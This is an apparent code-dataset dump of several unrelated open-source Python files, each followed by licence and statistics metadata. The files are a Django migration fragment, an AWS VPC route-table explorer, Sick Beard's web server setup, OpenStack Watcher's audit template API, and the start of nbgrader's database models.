'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
u'core.talk': {
'Meta': {'object_name': 'Talk'},
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'speakers': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['core.Speaker']", 'symmetrical': 'False'}),
'start_time': ('django.db.models.fields.TimeField', [], {'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
}
}
complete_apps = ['core'] | gpl-3.0 | 1,897,258,236,742,869,000 | 45.46875 | 136 | 0.562395 | false | 3.543504 | false | false | false |
daniellawrence/aws-map | explorer.py | 1 | 1721 | #!/usr/bin/env python
import boto.ec2
import boto.vpc
from local_settings import AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY
import pprint
def region_connect(region_name):
vpc_conn = boto.vpc.connect_to_region(region_name,
aws_access_key_id=AWS_ACCESS_KEY_ID,
aws_secret_access_key=AWS_SECRET_ACCESS_KEY)
ec2_conn = boto.ec2.connect_to_region(region_name,
aws_access_key_id=AWS_ACCESS_KEY_ID,
aws_secret_access_key=AWS_SECRET_ACCESS_KEY)
return vpc_conn
def get_all_routetables(vpc_conn, filters={}):
raw_route_tables = vpc_conn.get_all_route_tables(filters=filters)
for rt in raw_route_tables:
#pprint.pprint(rt.__dict__)
for a in rt.associations:
if not a.subnet_id:
continue
pprint.pprint(a.__dict__)
for r in rt.routes:
gateway = r.gateway_id
if r.instance_id:
gateway = r.instance_id
print "%-20s -> %s" % (r.destination_cidr_block, gateway)
print "=="
def get_all_subnets(vpc_conn, filters={}):
raw_subnet_list = vpc_conn.get_all_subnets()
for s in raw_subnet_list:
get_all_routetables(vpc_conn, filters={'vpc_id': s.vpc_id})
#get_all_internet_gateways(vpc_conn)
def get_all_internet_gateways(vpc_conn, filters={}):
raw_igw_list = vpc_conn.get_all_internet_gateways(filters=filters)
for igw in raw_igw_list:
print igw
def main():
"Main"
vpc_conn = region_connect('ap-southeast-2')
get_all_subnets(vpc_conn)
if __name__ == '__main__':
main()
| mit | -6,424,525,554,819,934,000 | 32.745098 | 85 | 0.574666 | false | 3.442 | false | false | false |
eptmp3/Sick-Beard | sickbeard/webserveInit.py | 43 | 6433 | # Author: Nic Wolfe <[email protected]>
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of Sick Beard.
#
# Sick Beard is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Sick Beard is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Sick Beard. If not, see <http://www.gnu.org/licenses/>.
#import cherrypy
import cherrypy.lib.auth_basic
import os.path
import sickbeard
from sickbeard import logger
from sickbeard.webserve import WebInterface
from sickbeard.helpers import create_https_certificates
def initWebServer(options = {}):
options.setdefault('port', 8081)
options.setdefault('host', '0.0.0.0')
options.setdefault('log_dir', None)
options.setdefault('username', '')
options.setdefault('password', '')
options.setdefault('web_root', '/')
assert isinstance(options['port'], int)
assert 'data_root' in options
def http_error_401_hander(status, message, traceback, version):
""" Custom handler for 401 error """
if status != "401 Unauthorized":
logger.log(u"CherryPy caught an error: %s %s" % (status, message), logger.ERROR)
logger.log(traceback, logger.DEBUG)
return r'''
<html>
<head>
<title>%s</title>
</head>
<body>
<br/>
<font color="#0000FF">Error %s: You need to provide a valid username and password.</font>
</body>
</html>
''' % ('Access denied', status)
def http_error_404_hander(status, message, traceback, version):
""" Custom handler for 404 error, redirect back to main page """
return r'''
<html>
<head>
<title>404</title>
<script type="text/javascript" charset="utf-8">
<!--
location.href = "%s"
//-->
</script>
</head>
<body>
<br/>
</body>
</html>
''' % '/'
# cherrypy setup
enable_https = options['enable_https']
https_cert = options['https_cert']
https_key = options['https_key']
if enable_https:
# If either the HTTPS certificate or key do not exist, make some self-signed ones.
if not (https_cert and os.path.exists(https_cert)) or not (https_key and os.path.exists(https_key)):
if not create_https_certificates(https_cert, https_key):
logger.log(u"Unable to create cert/key files, disabling HTTPS")
sickbeard.ENABLE_HTTPS = False
enable_https = False
if not (os.path.exists(https_cert) and os.path.exists(https_key)):
logger.log(u"Disabled HTTPS because of missing CERT and KEY files", logger.WARNING)
sickbeard.ENABLE_HTTPS = False
enable_https = False
options_dict = {
'server.socket_port': options['port'],
'server.socket_host': options['host'],
'log.screen': False,
'error_page.401': http_error_401_hander,
'error_page.404': http_error_404_hander,
}
if enable_https:
options_dict['server.ssl_certificate'] = https_cert
options_dict['server.ssl_private_key'] = https_key
protocol = "https"
else:
protocol = "http"
logger.log(u"Starting Sick Beard on "+protocol+"://" + str(options['host']) + ":" + str(options['port']) + "/")
cherrypy.config.update(options_dict)
# setup cherrypy logging
if options['log_dir'] and os.path.isdir(options['log_dir']):
cherrypy.config.update({ 'log.access_file': os.path.join(options['log_dir'], "cherrypy.log") })
logger.log('Using %s for cherrypy log' % cherrypy.config['log.access_file'])
conf = {
'/': {
'tools.staticdir.root': options['data_root'],
'tools.encode.on': True,
'tools.encode.encoding': 'utf-8',
},
'/images': {
'tools.staticdir.on': True,
'tools.staticdir.dir': 'images'
},
'/js': {
'tools.staticdir.on': True,
'tools.staticdir.dir': 'js'
},
'/css': {
'tools.staticdir.on': True,
'tools.staticdir.dir': 'css'
},
}
app = cherrypy.tree.mount(WebInterface(), options['web_root'], conf)
# auth
if options['username'] != "" and options['password'] != "":
checkpassword = cherrypy.lib.auth_basic.checkpassword_dict({options['username']: options['password']})
app.merge({
'/': {
'tools.auth_basic.on': True,
'tools.auth_basic.realm': 'SickBeard',
'tools.auth_basic.checkpassword': checkpassword
},
'/api':{
'tools.auth_basic.on': False
},
'/api/builder':{
'tools.auth_basic.on': True,
'tools.auth_basic.realm': 'SickBeard',
'tools.auth_basic.checkpassword': checkpassword
}
})
cherrypy.server.start()
cherrypy.server.wait()
| gpl-3.0 | 3,527,258,859,284,974,600 | 38.459119 | 119 | 0.494948 | false | 4.436552 | false | false | false |
stackforge/watcher | watcher/api/controllers/v1/audit_template.py | 2 | 27944 | # -*- encoding: utf-8 -*-
# Copyright 2013 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
An :ref:`Audit <audit_definition>` may be launched several times with the same
settings (:ref:`Goal <goal_definition>`, thresholds, ...). Therefore it makes
sense to save those settings in some sort of Audit preset object, which is
known as an :ref:`Audit Template <audit_template_definition>`.
An :ref:`Audit Template <audit_template_definition>` contains at least the
:ref:`Goal <goal_definition>` of the :ref:`Audit <audit_definition>`.
It may also contain some error handling settings indicating whether:
- :ref:`Watcher Applier <watcher_applier_definition>` stops the
entire operation
- :ref:`Watcher Applier <watcher_applier_definition>` performs a rollback
and how many retries should be attempted before failure occurs (also the latter
can be complex: for example the scenario in which there are many first-time
failures on ultimately successful :ref:`Actions <action_definition>`).
Moreover, an :ref:`Audit Template <audit_template_definition>` may contain some
settings related to the level of automation for the
:ref:`Action Plan <action_plan_definition>` that will be generated by the
:ref:`Audit <audit_definition>`.
A flag will indicate whether the :ref:`Action Plan <action_plan_definition>`
will be launched automatically or will need a manual confirmation from the
:ref:`Administrator <administrator_definition>`.
"""
import datetime
import pecan
from pecan import rest
import wsme
from wsme import types as wtypes
import wsmeext.pecan as wsme_pecan
from watcher._i18n import _
from watcher.api.controllers import base
from watcher.api.controllers import link
from watcher.api.controllers.v1 import collection
from watcher.api.controllers.v1 import types
from watcher.api.controllers.v1 import utils as api_utils
from watcher.common import context as context_utils
from watcher.common import exception
from watcher.common import policy
from watcher.common import utils as common_utils
from watcher.decision_engine.loading import default as default_loading
from watcher import objects
def hide_fields_in_newer_versions(obj):
"""This method hides fields that were added in newer API versions.
Certain node fields were introduced at certain API versions.
These fields are only made available when the request's API version
matches or exceeds the versions when these fields were introduced.
"""
pass
class AuditTemplatePostType(wtypes.Base):
_ctx = context_utils.make_context()
name = wtypes.wsattr(wtypes.text, mandatory=True)
"""Name of this audit template"""
description = wtypes.wsattr(wtypes.text, mandatory=False)
"""Short description of this audit template"""
goal = wtypes.wsattr(wtypes.text, mandatory=True)
"""Goal UUID or name of the audit template"""
strategy = wtypes.wsattr(wtypes.text, mandatory=False)
"""Strategy UUID or name of the audit template"""
scope = wtypes.wsattr(types.jsontype, mandatory=False, default=[])
"""Audit Scope"""
def as_audit_template(self):
return AuditTemplate(
name=self.name,
description=self.description,
goal_id=self.goal, # Dirty trick ...
goal=self.goal,
strategy_id=self.strategy, # Dirty trick ...
strategy_uuid=self.strategy,
scope=self.scope,
)
@staticmethod
def _build_schema():
SCHEMA = {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "array",
"items": {
"type": "object",
"properties": AuditTemplatePostType._get_schemas(),
"additionalProperties": False
}
}
return SCHEMA
@staticmethod
def _get_schemas():
collectors = default_loading.ClusterDataModelCollectorLoader(
).list_available()
schemas = {k: c.SCHEMA for k, c
in collectors.items() if hasattr(c, "SCHEMA")}
return schemas
@staticmethod
def validate(audit_template):
available_goals = objects.Goal.list(AuditTemplatePostType._ctx)
available_goal_uuids_map = {g.uuid: g for g in available_goals}
available_goal_names_map = {g.name: g for g in available_goals}
if audit_template.goal in available_goal_uuids_map:
goal = available_goal_uuids_map[audit_template.goal]
elif audit_template.goal in available_goal_names_map:
goal = available_goal_names_map[audit_template.goal]
else:
raise exception.InvalidGoal(goal=audit_template.goal)
if audit_template.scope:
keys = [list(s)[0] for s in audit_template.scope]
if keys[0] not in ('compute', 'storage'):
audit_template.scope = [dict(compute=audit_template.scope)]
common_utils.Draft4Validator(
AuditTemplatePostType._build_schema()
).validate(audit_template.scope)
include_host_aggregates = False
exclude_host_aggregates = False
for rule in audit_template.scope[0]['compute']:
if 'host_aggregates' in rule:
include_host_aggregates = True
elif 'exclude' in rule:
for resource in rule['exclude']:
if 'host_aggregates' in resource:
exclude_host_aggregates = True
if include_host_aggregates and exclude_host_aggregates:
raise exception.Invalid(
message=_(
"host_aggregates can't be "
"included and excluded together"))
if audit_template.strategy:
try:
if (common_utils.is_uuid_like(audit_template.strategy) or
common_utils.is_int_like(audit_template.strategy)):
strategy = objects.Strategy.get(
AuditTemplatePostType._ctx, audit_template.strategy)
else:
strategy = objects.Strategy.get_by_name(
AuditTemplatePostType._ctx, audit_template.strategy)
except Exception:
raise exception.InvalidStrategy(
strategy=audit_template.strategy)
# Check that the strategy we indicate is actually related to the
# specified goal
if strategy.goal_id != goal.id:
available_strategies = objects.Strategy.list(
AuditTemplatePostType._ctx)
choices = ["'%s' (%s)" % (s.uuid, s.name)
for s in available_strategies]
raise exception.InvalidStrategy(
message=_(
"'%(strategy)s' strategy does relate to the "
"'%(goal)s' goal. Possible choices: %(choices)s")
% dict(strategy=strategy.name, goal=goal.name,
choices=", ".join(choices)))
audit_template.strategy = strategy.uuid
# We force the UUID so that we do not need to query the DB with the
# name afterwards
audit_template.goal = goal.uuid
return audit_template
class AuditTemplatePatchType(types.JsonPatchType):
_ctx = context_utils.make_context()
@staticmethod
def mandatory_attrs():
return []
@staticmethod
def validate(patch):
if patch.path == "/goal" and patch.op != "remove":
AuditTemplatePatchType._validate_goal(patch)
elif patch.path == "/goal" and patch.op == "remove":
raise exception.OperationNotPermitted(
_("Cannot remove 'goal' attribute "
"from an audit template"))
if patch.path == "/strategy":
AuditTemplatePatchType._validate_strategy(patch)
return types.JsonPatchType.validate(patch)
@staticmethod
def _validate_goal(patch):
patch.path = "/goal_id"
goal = patch.value
if goal:
available_goals = objects.Goal.list(
AuditTemplatePatchType._ctx)
available_goal_uuids_map = {g.uuid: g for g in available_goals}
available_goal_names_map = {g.name: g for g in available_goals}
if goal in available_goal_uuids_map:
patch.value = available_goal_uuids_map[goal].id
elif goal in available_goal_names_map:
patch.value = available_goal_names_map[goal].id
else:
raise exception.InvalidGoal(goal=goal)
@staticmethod
def _validate_strategy(patch):
patch.path = "/strategy_id"
strategy = patch.value
if strategy:
available_strategies = objects.Strategy.list(
AuditTemplatePatchType._ctx)
available_strategy_uuids_map = {
s.uuid: s for s in available_strategies}
available_strategy_names_map = {
s.name: s for s in available_strategies}
if strategy in available_strategy_uuids_map:
patch.value = available_strategy_uuids_map[strategy].id
elif strategy in available_strategy_names_map:
patch.value = available_strategy_names_map[strategy].id
else:
raise exception.InvalidStrategy(strategy=strategy)
class AuditTemplate(base.APIBase):
"""API representation of a audit template.
This class enforces type checking and value constraints, and converts
between the internal object model and the API representation of an
audit template.
"""
_goal_uuid = None
_goal_name = None
_strategy_uuid = None
_strategy_name = None
def _get_goal(self, value):
if value == wtypes.Unset:
return None
goal = None
try:
if (common_utils.is_uuid_like(value) or
common_utils.is_int_like(value)):
goal = objects.Goal.get(
pecan.request.context, value)
else:
goal = objects.Goal.get_by_name(
pecan.request.context, value)
except exception.GoalNotFound:
pass
if goal:
self.goal_id = goal.id
return goal
def _get_strategy(self, value):
if value == wtypes.Unset:
return None
strategy = None
try:
if (common_utils.is_uuid_like(value) or
common_utils.is_int_like(value)):
strategy = objects.Strategy.get(
pecan.request.context, value)
else:
strategy = objects.Strategy.get_by_name(
pecan.request.context, value)
except exception.StrategyNotFound:
pass
if strategy:
self.strategy_id = strategy.id
return strategy
def _get_goal_uuid(self):
return self._goal_uuid
def _set_goal_uuid(self, value):
if value and self._goal_uuid != value:
self._goal_uuid = None
goal = self._get_goal(value)
if goal:
self._goal_uuid = goal.uuid
def _get_strategy_uuid(self):
return self._strategy_uuid
def _set_strategy_uuid(self, value):
if value and self._strategy_uuid != value:
self._strategy_uuid = None
strategy = self._get_strategy(value)
if strategy:
self._strategy_uuid = strategy.uuid
def _get_goal_name(self):
return self._goal_name
def _set_goal_name(self, value):
if value and self._goal_name != value:
self._goal_name = None
goal = self._get_goal(value)
if goal:
self._goal_name = goal.name
def _get_strategy_name(self):
return self._strategy_name
def _set_strategy_name(self, value):
if value and self._strategy_name != value:
self._strategy_name = None
strategy = self._get_strategy(value)
if strategy:
self._strategy_name = strategy.name
uuid = wtypes.wsattr(types.uuid, readonly=True)
"""Unique UUID for this audit template"""
name = wtypes.text
"""Name of this audit template"""
description = wtypes.wsattr(wtypes.text, mandatory=False)
"""Short description of this audit template"""
goal_uuid = wtypes.wsproperty(
wtypes.text, _get_goal_uuid, _set_goal_uuid, mandatory=True)
"""Goal UUID the audit template refers to"""
goal_name = wtypes.wsproperty(
wtypes.text, _get_goal_name, _set_goal_name, mandatory=False)
"""The name of the goal this audit template refers to"""
strategy_uuid = wtypes.wsproperty(
wtypes.text, _get_strategy_uuid, _set_strategy_uuid, mandatory=False)
"""Strategy UUID the audit template refers to"""
strategy_name = wtypes.wsproperty(
wtypes.text, _get_strategy_name, _set_strategy_name, mandatory=False)
"""The name of the strategy this audit template refers to"""
audits = wtypes.wsattr([link.Link], readonly=True)
"""Links to the collection of audits contained in this audit template"""
links = wtypes.wsattr([link.Link], readonly=True)
"""A list containing a self link and associated audit template links"""
scope = wtypes.wsattr(types.jsontype, mandatory=False)
"""Audit Scope"""
def __init__(self, **kwargs):
super(AuditTemplate, self).__init__()
self.fields = []
fields = list(objects.AuditTemplate.fields)
for k in fields:
# Skip fields we do not expose.
if not hasattr(self, k):
continue
self.fields.append(k)
setattr(self, k, kwargs.get(k, wtypes.Unset))
self.fields.append('goal_id')
self.fields.append('strategy_id')
setattr(self, 'strategy_id', kwargs.get('strategy_id', wtypes.Unset))
# goal_uuid & strategy_uuid are not part of
# objects.AuditTemplate.fields because they're API-only attributes.
self.fields.append('goal_uuid')
self.fields.append('goal_name')
self.fields.append('strategy_uuid')
self.fields.append('strategy_name')
setattr(self, 'goal_uuid', kwargs.get('goal_id', wtypes.Unset))
setattr(self, 'goal_name', kwargs.get('goal_id', wtypes.Unset))
setattr(self, 'strategy_uuid',
kwargs.get('strategy_id', wtypes.Unset))
setattr(self, 'strategy_name',
kwargs.get('strategy_id', wtypes.Unset))
@staticmethod
def _convert_with_links(audit_template, url, expand=True):
if not expand:
audit_template.unset_fields_except(
['uuid', 'name', 'goal_uuid', 'goal_name',
'scope', 'strategy_uuid', 'strategy_name'])
# The numeric ID should not be exposed to
# the user, it's internal only.
audit_template.goal_id = wtypes.Unset
audit_template.strategy_id = wtypes.Unset
audit_template.links = [link.Link.make_link('self', url,
'audit_templates',
audit_template.uuid),
link.Link.make_link('bookmark', url,
'audit_templates',
audit_template.uuid,
bookmark=True)]
return audit_template
@classmethod
def convert_with_links(cls, rpc_audit_template, expand=True):
audit_template = AuditTemplate(**rpc_audit_template.as_dict())
hide_fields_in_newer_versions(audit_template)
return cls._convert_with_links(audit_template, pecan.request.host_url,
expand)
@classmethod
def sample(cls, expand=True):
sample = cls(uuid='27e3153e-d5bf-4b7e-b517-fb518e17f34c',
name='My Audit Template',
description='Description of my audit template',
goal_uuid='83e44733-b640-40e2-8d8a-7dd3be7134e6',
strategy_uuid='367d826e-b6a4-4b70-bc44-c3f6fe1c9986',
created_at=datetime.datetime.utcnow(),
deleted_at=None,
updated_at=datetime.datetime.utcnow(),
scope=[],)
return cls._convert_with_links(sample, 'http://localhost:9322', expand)
class AuditTemplateCollection(collection.Collection):
"""API representation of a collection of audit templates."""
audit_templates = [AuditTemplate]
"""A list containing audit templates objects"""
def __init__(self, **kwargs):
super(AuditTemplateCollection, self).__init__()
self._type = 'audit_templates'
@staticmethod
def convert_with_links(rpc_audit_templates, limit, url=None, expand=False,
**kwargs):
at_collection = AuditTemplateCollection()
at_collection.audit_templates = [
AuditTemplate.convert_with_links(p, expand)
for p in rpc_audit_templates]
at_collection.next = at_collection.get_next(limit, url=url, **kwargs)
return at_collection
@classmethod
def sample(cls):
sample = cls()
sample.audit_templates = [AuditTemplate.sample(expand=False)]
return sample
class AuditTemplatesController(rest.RestController):
"""REST controller for AuditTemplates."""
def __init__(self):
super(AuditTemplatesController, self).__init__()
from_audit_templates = False
"""A flag to indicate if the requests to this controller are coming
from the top-level resource AuditTemplates."""
_custom_actions = {
'detail': ['GET'],
}
def _get_audit_templates_collection(self, filters, marker, limit,
sort_key, sort_dir, expand=False,
resource_url=None):
additional_fields = ["goal_uuid", "goal_name", "strategy_uuid",
"strategy_name"]
api_utils.validate_sort_key(
sort_key, list(objects.AuditTemplate.fields) + additional_fields)
api_utils.validate_search_filters(
filters, list(objects.AuditTemplate.fields) + additional_fields)
limit = api_utils.validate_limit(limit)
api_utils.validate_sort_dir(sort_dir)
marker_obj = None
if marker:
marker_obj = objects.AuditTemplate.get_by_uuid(
pecan.request.context,
marker)
need_api_sort = api_utils.check_need_api_sort(sort_key,
additional_fields)
sort_db_key = (sort_key if not need_api_sort
else None)
audit_templates = objects.AuditTemplate.list(
pecan.request.context, filters, limit, marker_obj,
sort_key=sort_db_key, sort_dir=sort_dir)
audit_templates_collection = \
AuditTemplateCollection.convert_with_links(
audit_templates, limit, url=resource_url, expand=expand,
sort_key=sort_key, sort_dir=sort_dir)
if need_api_sort:
api_utils.make_api_sort(
audit_templates_collection.audit_templates, sort_key,
sort_dir)
return audit_templates_collection
@wsme_pecan.wsexpose(AuditTemplateCollection, wtypes.text, wtypes.text,
types.uuid, int, wtypes.text, wtypes.text)
def get_all(self, goal=None, strategy=None, marker=None,
limit=None, sort_key='id', sort_dir='asc'):
"""Retrieve a list of audit templates.
:param goal: goal UUID or name to filter by
:param strategy: strategy UUID or name to filter by
:param marker: pagination marker for large data sets.
:param limit: maximum number of resources to return in a single result.
:param sort_key: column to sort results by. Default: id.
:param sort_dir: direction to sort. "asc" or "desc". Default: asc.
"""
context = pecan.request.context
policy.enforce(context, 'audit_template:get_all',
action='audit_template:get_all')
filters = {}
if goal:
if common_utils.is_uuid_like(goal):
filters['goal_uuid'] = goal
else:
filters['goal_name'] = goal
if strategy:
if common_utils.is_uuid_like(strategy):
filters['strategy_uuid'] = strategy
else:
filters['strategy_name'] = strategy
return self._get_audit_templates_collection(
filters, marker, limit, sort_key, sort_dir)
@wsme_pecan.wsexpose(AuditTemplateCollection, wtypes.text, wtypes.text,
types.uuid, int, wtypes.text, wtypes.text)
def detail(self, goal=None, strategy=None, marker=None,
limit=None, sort_key='id', sort_dir='asc'):
"""Retrieve a list of audit templates with detail.
:param goal: goal UUID or name to filter by
:param strategy: strategy UUID or name to filter by
:param marker: pagination marker for large data sets.
:param limit: maximum number of resources to return in a single result.
:param sort_key: column to sort results by. Default: id.
:param sort_dir: direction to sort. "asc" or "desc". Default: asc.
"""
context = pecan.request.context
policy.enforce(context, 'audit_template:detail',
action='audit_template:detail')
# NOTE(lucasagomes): /detail should only work agaist collections
parent = pecan.request.path.split('/')[:-1][-1]
if parent != "audit_templates":
raise exception.HTTPNotFound
filters = {}
if goal:
if common_utils.is_uuid_like(goal):
filters['goal_uuid'] = goal
else:
filters['goal_name'] = goal
if strategy:
if common_utils.is_uuid_like(strategy):
filters['strategy_uuid'] = strategy
else:
filters['strategy_name'] = strategy
expand = True
resource_url = '/'.join(['audit_templates', 'detail'])
return self._get_audit_templates_collection(filters, marker, limit,
sort_key, sort_dir, expand,
resource_url)
@wsme_pecan.wsexpose(AuditTemplate, wtypes.text)
def get_one(self, audit_template):
"""Retrieve information about the given audit template.
:param audit_template: UUID or name of an audit template.
"""
if self.from_audit_templates:
raise exception.OperationNotPermitted
context = pecan.request.context
rpc_audit_template = api_utils.get_resource('AuditTemplate',
audit_template)
policy.enforce(context, 'audit_template:get', rpc_audit_template,
action='audit_template:get')
return AuditTemplate.convert_with_links(rpc_audit_template)
@wsme.validate(types.uuid, AuditTemplatePostType)
@wsme_pecan.wsexpose(AuditTemplate, body=AuditTemplatePostType,
status_code=201)
def post(self, audit_template_postdata):
"""Create a new audit template.
:param audit_template_postdata: the audit template POST data
from the request body.
"""
if self.from_audit_templates:
raise exception.OperationNotPermitted
context = pecan.request.context
policy.enforce(context, 'audit_template:create',
action='audit_template:create')
context = pecan.request.context
audit_template = audit_template_postdata.as_audit_template()
audit_template_dict = audit_template.as_dict()
new_audit_template = objects.AuditTemplate(context,
**audit_template_dict)
new_audit_template.create()
# Set the HTTP Location Header
pecan.response.location = link.build_url(
'audit_templates', new_audit_template.uuid)
return AuditTemplate.convert_with_links(new_audit_template)
@wsme.validate(types.uuid, [AuditTemplatePatchType])
@wsme_pecan.wsexpose(AuditTemplate, wtypes.text,
body=[AuditTemplatePatchType])
def patch(self, audit_template, patch):
"""Update an existing audit template.
:param template_uuid: UUID of a audit template.
:param patch: a json PATCH document to apply to this audit template.
"""
if self.from_audit_templates:
raise exception.OperationNotPermitted
context = pecan.request.context
audit_template_to_update = api_utils.get_resource('AuditTemplate',
audit_template)
policy.enforce(context, 'audit_template:update',
audit_template_to_update,
action='audit_template:update')
if common_utils.is_uuid_like(audit_template):
audit_template_to_update = objects.AuditTemplate.get_by_uuid(
pecan.request.context,
audit_template)
else:
audit_template_to_update = objects.AuditTemplate.get_by_name(
pecan.request.context,
audit_template)
try:
audit_template_dict = audit_template_to_update.as_dict()
audit_template = AuditTemplate(**api_utils.apply_jsonpatch(
audit_template_dict, patch))
except api_utils.JSONPATCH_EXCEPTIONS as e:
raise exception.PatchError(patch=patch, reason=e)
# Update only the fields that have changed
for field in objects.AuditTemplate.fields:
try:
patch_val = getattr(audit_template, field)
except AttributeError:
# Ignore fields that aren't exposed in the API
continue
if patch_val == wtypes.Unset:
patch_val = None
if audit_template_to_update[field] != patch_val:
audit_template_to_update[field] = patch_val
audit_template_to_update.save()
return AuditTemplate.convert_with_links(audit_template_to_update)
@wsme_pecan.wsexpose(None, wtypes.text, status_code=204)
def delete(self, audit_template):
"""Delete a audit template.
:param template_uuid: UUID or name of an audit template.
"""
context = pecan.request.context
audit_template_to_delete = api_utils.get_resource('AuditTemplate',
audit_template)
policy.enforce(context, 'audit_template:delete',
audit_template_to_delete,
action='audit_template:delete')
audit_template_to_delete.soft_delete()
| apache-2.0 | 1,051,578,209,060,174,100 | 38.357746 | 79 | 0.596228 | false | 4.289179 | false | false | false |
alope107/nbgrader | nbgrader/api.py | 4 | 81499 | from __future__ import division
from nbgrader import utils
from sqlalchemy import (create_engine, ForeignKey, Column, String, Text,
DateTime, Interval, Float, Enum, UniqueConstraint, Boolean)
from sqlalchemy.orm import sessionmaker, scoped_session, relationship, column_property
from sqlalchemy.orm.exc import NoResultFound, FlushError
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.ext.associationproxy import association_proxy
from sqlalchemy.exc import IntegrityError
from sqlalchemy.sql import and_
from sqlalchemy import select, func, exists, case, literal_column
from uuid import uuid4
Base = declarative_base()
class InvalidEntry(ValueError):
pass
class MissingEntry(ValueError):
pass
def new_uuid():
return uuid4().hex
class Assignment(Base):
"""Database representation of the master/source version of an assignment."""
__tablename__ = "assignment"
#: Unique id of the assignment (automatically generated)
id = Column(String(32), primary_key=True, default=new_uuid)
#: Unique human-readable name for the assignment, such as "Problem Set 1"
name = Column(String(128), unique=True, nullable=False)
#: (Optional) Duedate for the assignment in datetime format, with UTC timezone
duedate = Column(DateTime())
#: A collection of notebooks contained in this assignment, represented
#: by :class:`~nbgrader.api.Notebook` objects
notebooks = relationship("Notebook", backref="assignment", order_by="Notebook.name")
#: A collection of submissions of this assignment, represented by
#: :class:`~nbgrader.api.SubmittedAssignment` objects.
submissions = relationship("SubmittedAssignment", backref="assignment")
#: The number of submissions of this assignment
num_submissions = None
#: Maximum score achievable on this assignment, automatically calculated
#: from the :attr:`~nbgrader.api.Notebook.max_score` of each notebook
max_score = None
#: Maximum coding score achievable on this assignment, automatically
#: calculated from the :attr:`~nbgrader.api.Notebook.max_code_score` of
#: each notebook
max_code_score = None
#: Maximum written score achievable on this assignment, automatically
#: calculated from the :attr:`~nbgrader.api.Notebook.max_written_score` of
#: each notebook
max_written_score = None
def to_dict(self):
"""Convert the assignment object to a JSON-friendly dictionary
representation.
"""
return {
"id": self.id,
"name": self.name,
"duedate": self.duedate.isoformat() if self.duedate is not None else None,
"num_submissions": self.num_submissions,
"max_score": self.max_score,
"max_code_score": self.max_code_score,
"max_written_score": self.max_written_score,
}
def __repr__(self):
return "Assignment<{}>".format(self.name)
class Notebook(Base):
"""Database representation of the master/source version of a notebook."""
__tablename__ = "notebook"
__table_args__ = (UniqueConstraint('name', 'assignment_id'),)
#: Unique id of the notebook (automatically generated)
id = Column(String(32), primary_key=True, default=new_uuid)
#: Unique human-readable name for the notebook, such as "Problem 1". Note
#: the uniqueness is only constrained within assignments (e.g. it is ok for
#: two different assignments to both have notebooks called "Problem 1", but
#: the same assignment cannot have two notebooks with the same name).
name = Column(String(128), nullable=False)
#: The :class:`~nbgrader.api.Assignment` object that this notebook is a
#: part of
assignment = None
#: Unique id of :attr:`~nbgrader.api.Notebook.assignment`
assignment_id = Column(String(32), ForeignKey('assignment.id'))
#: A collection of grade cells contained within this notebook, represented
#: by :class:`~nbgrader.api.GradeCell` objects
grade_cells = relationship("GradeCell", backref="notebook")
#: A collection of solution cells contained within this notebook, represented
#: by :class:`~nbgrader.api.SolutionCell` objects
solution_cells = relationship("SolutionCell", backref="notebook")
#: A collection of source cells contained within this notebook, represented
#: by :class:`~nbgrader.api.SourceCell` objects
source_cells = relationship("SourceCell", backref="notebook")
#: A collection of submitted versions of this notebook, represented by
#: :class:`~nbgrader.api.SubmittedNotebook` objects
submissions = relationship("SubmittedNotebook", backref="notebook")
#: The number of submissions of this notebook
num_submissions = None
#: Maximum score achievable on this notebook, automatically calculated
#: from the :attr:`~nbgrader.api.GradeCell.max_score` of each grade cell
max_score = None
#: Maximum coding score achievable on this notebook, automatically
#: calculated from the :attr:`~nbgrader.api.GradeCell.max_score` and
#: :attr:`~nbgrader.api.GradeCell.cell_type` of each grade cell
max_code_score = None
#: Maximum written score achievable on this notebook, automatically
#: calculated from the :attr:`~nbgrader.api.GradeCell.max_score` and
#: :attr:`~nbgrader.api.GradeCell.cell_type` of each grade cell
max_written_score = None
#: Whether there are any submitted versions of this notebook that need to
#: be manually graded, automatically determined from the
#: :attr:`~nbgrader.api.SubmittedNotebook.needs_manual_grade` attribute of
#: each submitted notebook
needs_manual_grade = None
def to_dict(self):
"""Convert the notebook object to a JSON-friendly dictionary
representation.
"""
return {
"id": self.id,
"name": self.name,
"num_submissions": self.num_submissions,
"max_score": self.max_score,
"max_code_score": self.max_code_score,
"max_written_score": self.max_written_score,
"needs_manual_grade": self.needs_manual_grade
}
def __repr__(self):
return "Notebook<{}/{}>".format(self.assignment.name, self.name)
class GradeCell(Base):
"""Database representation of the master/source version of a grade cell."""
__tablename__ = "grade_cell"
__table_args__ = (UniqueConstraint('name', 'notebook_id'),)
#: Unique id of the grade cell (automatically generated)
id = Column(String(32), primary_key=True, default=new_uuid)
#: Unique human-readable name of the grade cell. This need only be unique
#: within the notebook, not across notebooks.
name = Column(String(128), nullable=False)
#: Maximum score that can be assigned to this grade cell
max_score = Column(Float(), nullable=False)
#: The cell type, either "code" or "markdown"
cell_type = Column(Enum("code", "markdown"), nullable=False)
#: The :class:`~nbgrader.api.Notebook` that this grade cell is contained in
notebook = None
#: Unique id of the :attr:`~nbgrader.api.GradeCell.notebook`
notebook_id = Column(String(32), ForeignKey('notebook.id'))
